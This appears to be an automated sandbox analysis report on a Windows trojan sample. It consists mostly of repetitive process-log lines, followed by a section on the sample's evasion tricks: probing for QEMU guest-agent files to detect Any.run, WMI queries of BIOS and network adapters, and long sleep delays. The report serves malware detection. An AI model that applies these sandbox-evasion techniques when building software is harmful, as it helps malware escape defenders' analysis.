Code function: 7_2_00007FF6F447B0C8 OpenSCManagerW,OpenServiceW,CloseServiceHandle,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,

7_2_00007FF6F447B0C8

Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\MpSigStub.exe

Key value created or modified: HKEY_USERSS-1-5-20\SOFTWARE\Microsoft\IdentityCRL\Immersive\production\Token\{67082621-8D18-4333-9C64-10DE93676363} DeviceTicket

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate

Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen17.57062.9420.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-e428c3f6.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-e428c3f6.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-e428c3f6.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-e428c3f6.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-e428c3f6.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-e428c3f6.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-e428c3f6.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-e428c3f6.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-e428c3f6.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-e428c3f6.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-e428c3f6.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\2C39E2B2-9640-4516-B068-8044B49E3F95\MpSigStub.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\2C39E2B2-9640-4516-B068-8044B49E3F95\MpSigStub.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\2C39E2B2-9640-4516-B068-8044B49E3F95\MpSigStub.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\2C39E2B2-9640-4516-B068-8044B49E3F95\MpSigStub.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\2C39E2B2-9640-4516-B068-8044B49E3F95\MpSigStub.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\2C39E2B2-9640-4516-B068-8044B49E3F95\MpSigStub.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\2C39E2B2-9640-4516-B068-8044B49E3F95\MpSigStub.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\2C39E2B2-9640-4516-B068-8044B49E3F95\MpSigStub.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\2C39E2B2-9640-4516-B068-8044B49E3F95\MpSigStub.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\2C39E2B2-9640-4516-B068-8044B49E3F95\MpSigStub.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\2C39E2B2-9640-4516-B068-8044B49E3F95\MpSigStub.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\2C39E2B2-9640-4516-B068-8044B49E3F95\MpSigStub.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\2C39E2B2-9640-4516-B068-8044B49E3F95\MpSigStub.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\2C39E2B2-9640-4516-B068-8044B49E3F95\MpSigStub.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\2C39E2B2-9640-4516-B068-8044B49E3F95\MpSigStub.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\2C39E2B2-9640-4516-B068-8044B49E3F95\MpSigStub.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\2C39E2B2-9640-4516-B068-8044B49E3F95\MpSigStub.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\2C39E2B2-9640-4516-B068-8044B49E3F95\MpSigStub.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\2C39E2B2-9640-4516-B068-8044B49E3F95\MpSigStub.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\2C39E2B2-9640-4516-B068-8044B49E3F95\MpSigStub.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\2C39E2B2-9640-4516-B068-8044B49E3F95\MpSigStub.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\2C39E2B2-9640-4516-B068-8044B49E3F95\MpSigStub.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\2C39E2B2-9640-4516-B068-8044B49E3F95\MpSigStub.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\2C39E2B2-9640-4516-B068-8044B49E3F95\MpSigStub.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-60574f34.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-60574f34.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-60574f34.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-60574f34.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-60574f34.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-60574f34.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-60574f34.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-60574f34.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-60574f34.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-60574f34.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-60574f34.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\MpSigStub.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\MpSigStub.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\MpSigStub.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\MpSigStub.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\MpSigStub.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\MpSigStub.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\MpSigStub.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\MpSigStub.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\MpSigStub.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\MpSigStub.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\MpSigStub.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\MpSigStub.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\MpSigStub.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\MpSigStub.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\MpSigStub.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\MpSigStub.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\MpSigStub.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\MpSigStub.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\MpSigStub.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\MpSigStub.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\MpSigStub.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\MpSigStub.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\MpSigStub.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\MpSigStub.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\MpSigStub.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\MpSigStub.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\MpSigStub.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\MpSigStub.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\MpSigStub.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\MpSigStub.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\MpSigStub.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\MpSigStub.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\MpSigStub.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\MpSigStub.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\MpSigStub.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\MpSigStub.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2108.7-0\NisSrv.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2108.7-0\NisSrv.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2108.7-0\NisSrv.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2108.7-0\NisSrv.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2108.7-0\NisSrv.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Tries to detect Any.run

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen17.57062.9420.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen17.57062.9420.exe	File opened: C:\Program Files\qga\qga.exe	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Program Files\qga\qga.exe	Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: SecuriteInfo.com.Trojan.Siggen17.57062.9420.exe, 00000001.00000002.18483614717.0000000002B11000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
Source: SecuriteInfo.com.Trojan.Siggen17.57062.9420.exe, 00000001.00000002.18483614717.0000000002B11000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: NTDLLUSER32KERNEL32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 10.0; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOSHELL32ADVAPI32TEMP=WINDIR=\MICROSOFT.NET\FRAMEWORK\V4.0.30319\CASPOL.EXEWINDIR=\SYSWOW64\IERTUTIL.DLL

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard

Source: C:\Windows\System32\svchost.exe TID: 2040	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 7928	Thread sleep time: -7378697629483816s >= -30000s	Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\MpSigStub.exe TID: 8032	Thread sleep time: -30000s >= -30000s

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Window / User API: threadDelayed 9498

Jump to behavior

